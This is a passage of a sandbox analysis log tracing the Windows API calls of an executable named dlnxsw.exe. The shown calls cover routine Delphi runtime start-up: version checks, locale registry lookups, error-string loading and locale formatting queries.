# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 04.09.2020 06:44:42.198 Process: id = "1" image_name = "dlnxsw.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe" page_root = "0x41d7d000" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa68 [0050.545] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0050.546] SetThreadLocale (Locale=0x400) returned 1 [0050.634] GetVersion () returned 0x1db10106 [0050.634] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.634] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadPreferredUILanguages") returned 0x76dc47a1 [0050.634] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.634] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadPreferredUILanguages") returned 0x76dd79e5 [0050.634] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.634] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadUILanguage") returned 0x76d6cf14 [0050.634] GetSystemInfo (in: lpSystemInfo=0x18fb98 | out: lpSystemInfo=0x18fb98*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0050.635] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.635] GetStartupInfoW (in: lpStartupInfo=0x18fb74 | out: lpStartupInfo=0x18fb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0050.635] GetACP () returned 0x4e4 [0050.635] GetCurrentThreadId () returned 0xa68 [0050.635] GetVersion () returned 0x1db10106 [0050.635] GetVersionExW (in: lpVersionInformation=0x18faa8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c7019b, dwMinorVersion=0x77c702ea, dwBuildNumber=0x672980, dwPlatformId=0x18fb0e, szCSDVersion="") | out: lpVersionInformation=0x18faa8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.635] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x18d964, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0050.635] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18d74e, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1e90000 [0050.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18d6c8 | out: phkResult=0x18d6c8*=0x0) returned 0x2 [0050.636] GetUserDefaultUILanguage () returned 0x409 [0050.639] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0050.639] GetThreadUILanguage () returned 0x180409 [0050.639] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18d6a4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18d6cc | out: pulNumLanguages=0x18d6a4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18d6cc) returned 1 [0050.639] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18d6a4, pwszLanguagesBuffer=0x1fba680, pcchLanguagesBuffer=0x18d6cc | out: pulNumLanguages=0x18d6a4, pwszLanguagesBuffer=0x1fba680, pcchLanguagesBuffer=0x18d6cc) returned 1 [0050.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.en-US", lpFindFileData=0x18d474 | out: lpFindFileData=0x18d474*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d3b0, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18d6dc, ftLastAccessTime.dwHighDateTime=0x19, ftLastWriteTime.dwLowDateTime=0x132e82, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x11000110, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x686768, cFileName="杨h4쀀", cAlternateFileName="跜Ǽ譤@-")) returned 0xffffffff [0050.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.en", lpFindFileData=0x18d474 | out: lpFindFileData=0x18d474*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d3b0, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18d6dc, ftLastAccessTime.dwHighDateTime=0x19, ftLastWriteTime.dwLowDateTime=0x132e82, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x11000110, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x686768, cFileName="杨h4쀀", cAlternateFileName="ᨬǼ譤@-")) returned 0xffffffff [0050.640] GetUserDefaultUILanguage () returned 0x409 [0050.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x18d6e8, cchData=4 | out: lpLCData="ENU") returned 4 [0050.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.ENU", lpFindFileData=0x18d474 | out: lpFindFileData=0x18d474*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d3b0, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18d6dc, ftLastAccessTime.dwHighDateTime=0x19, ftLastWriteTime.dwLowDateTime=0x132e82, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x11000110, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x686768, cFileName="杨h4쀀", cAlternateFileName="跜Ǽ譤@-")) returned 0xffffffff [0050.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.EN", lpFindFileData=0x18d474 | out: lpFindFileData=0x18d474*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d3b0, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18d6dc, ftLastAccessTime.dwHighDateTime=0x19, ftLastWriteTime.dwLowDateTime=0x132e82, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x11000110, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x686768, cFileName="杨h4쀀", cAlternateFileName="ᨬǼ譤@-")) returned 0xffffffff [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0050.641] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18db98, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18db90, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0050.642] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18db90, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0050.642] GetVersionExW (in: lpVersionInformation=0x18faa4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18faa4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.642] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0050.642] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6863d0 [0050.643] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0050.643] GetNativeSystemInfo (in: lpSystemInfo=0x18fa80 | out: lpSystemInfo=0x18fa80*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x18da64, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x18da64, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0050.643] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x18db88, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0050.643] GetVersionExW (in: lpVersionInformation=0x18fa98*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x55040006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x18fa98*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.643] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0050.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x1f880dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0050.644] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0050.644] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f96e, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0050.644] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18fb7c | out: phkResult=0x18fb7c*=0x0) returned 0x2 [0050.644] GetThreadLocale () returned 0x409 [0050.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fab4 | out: lpCPInfo=0x18fab4) returned 1 [0050.644] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0050.645] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0050.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0050.645] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x18fa14 | out: Buffer=0x0, ReturnedLength=0x18fa14) returned 0 [0050.645] GetLastError () returned 0x7a [0050.645] GetLogicalProcessorInformation (in: Buffer=0x1f799d0, ReturnedLength=0x18fa14 | out: Buffer=0x1f799d0, ReturnedLength=0x18fa14) returned 1 [0050.645] GetCurrentThreadId () returned 0xa68 [0050.645] GetCurrentThreadId () returned 0xa68 [0050.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x18f81c, cchData=256 | out: lpLCData="2") returned 2 [0050.645] GetThreadLocale () returned 0x409 [0050.645] EnumCalendarInfoW (lpCalInfoEnumProc=0x41fb08, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0050.646] GetThreadLocale () returned 0x409 [0050.646] EnumCalendarInfoW (lpCalInfoEnumProc=0x41fbac, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0050.646] GetCurrentThreadId () returned 0xa68 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x18f818, cchData=256 | out: lpLCData="Sun") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x18f818, cchData=256 | out: lpLCData="Sunday") returned 7 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x18f818, cchData=256 | out: lpLCData="Mon") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x18f818, cchData=256 | out: lpLCData="Monday") returned 7 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x18f818, cchData=256 | out: lpLCData="Tue") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x18f818, cchData=256 | out: lpLCData="Tuesday") returned 8 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x18f818, cchData=256 | out: lpLCData="Wed") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x18f818, cchData=256 | out: lpLCData="Wednesday") returned 10 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x18f818, cchData=256 | out: lpLCData="Thu") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x18f818, cchData=256 | out: lpLCData="Thursday") returned 9 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x18f818, cchData=256 | out: lpLCData="Fri") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x18f818, cchData=256 | out: lpLCData="Friday") returned 7 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x18f818, cchData=256 | out: lpLCData="Sat") returned 4 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x18f818, cchData=256 | out: lpLCData="Saturday") returned 9 [0050.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Jan") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x18f81c, cchData=256 | out: lpLCData="January") returned 8 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Feb") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x18f81c, cchData=256 | out: lpLCData="February") returned 9 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Mar") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x18f81c, cchData=256 | out: lpLCData="March") returned 6 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Apr") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x18f81c, cchData=256 | out: lpLCData="April") returned 6 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x18f81c, cchData=256 | out: lpLCData="May") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x18f81c, cchData=256 | out: lpLCData="May") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Jun") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x18f81c, cchData=256 | out: lpLCData="June") returned 5 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Jul") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x18f81c, cchData=256 | out: lpLCData="July") returned 5 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Aug") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x18f81c, cchData=256 | out: lpLCData="August") returned 7 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Sep") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x18f81c, cchData=256 | out: lpLCData="September") returned 10 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Oct") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x18f81c, cchData=256 | out: lpLCData="October") returned 8 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Nov") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x18f81c, cchData=256 | out: lpLCData="November") returned 9 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x18f81c, cchData=256 | out: lpLCData="Dec") returned 4 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x18f81c, cchData=256 | out: lpLCData="December") returned 9 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x18f86c, cchData=256 | out: lpLCData="$") returned 2 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x18f86c, cchData=256 | out: lpLCData="0") returned 2 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x18f86c, cchData=256 | out: lpLCData="0") returned 2 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x18fa64, cchData=2 | out: lpLCData=",") returned 2 [0050.647] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x18fa64, cchData=2 | out: lpLCData=".") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x18f86c, cchData=256 | out: lpLCData="2") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fa64, cchData=2 | out: lpLCData="/") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x18f824, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f824, cchData=256 | out: lpLCData="1") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x18f824, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f824, cchData=256 | out: lpLCData="1") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fa64, cchData=2 | out: lpLCData=":") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x18f86c, cchData=256 | out: lpLCData="AM") returned 3 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x18f86c, cchData=256 | out: lpLCData="PM") returned 3 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x18f86c, cchData=256 | out: lpLCData="0") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f86c, cchData=256 | out: lpLCData="0") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x18f86c, cchData=256 | out: lpLCData="0") returned 2 [0050.648] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x18fa64, cchData=2 | out: lpLCData=",") returned 2 [0050.648] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76e40000 [0050.648] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0050.648] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0050.649] GetProcAddress (hModule=0x76e40000, 